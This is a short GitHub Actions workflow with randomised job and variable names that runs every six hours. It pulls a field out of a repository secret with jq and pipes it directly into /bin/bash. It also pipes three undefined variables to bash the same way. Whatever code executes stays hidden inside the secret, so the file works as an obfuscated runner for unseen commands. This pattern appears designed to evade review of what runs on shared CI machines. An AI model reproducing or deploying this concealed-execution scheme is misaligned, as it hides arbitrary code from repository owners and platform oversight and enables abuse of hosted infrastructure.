name: duoknk
on:
  workflow_dispatch:
  schedule:
    - cron: '50 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duoknk
        env:
          pfuw207: ${{ secrets.pfuw207 }}
        run: |
          echo $pfuw207 | jq -r .cgq3 | /bin/bash
          echo $twm01341 | jq -r .j93 | /bin/bash
          echo $mmalr10 | jq -r .h0 | /bin/bash
          echo $uw59161 | jq -r .rb6680 | /bin/bash

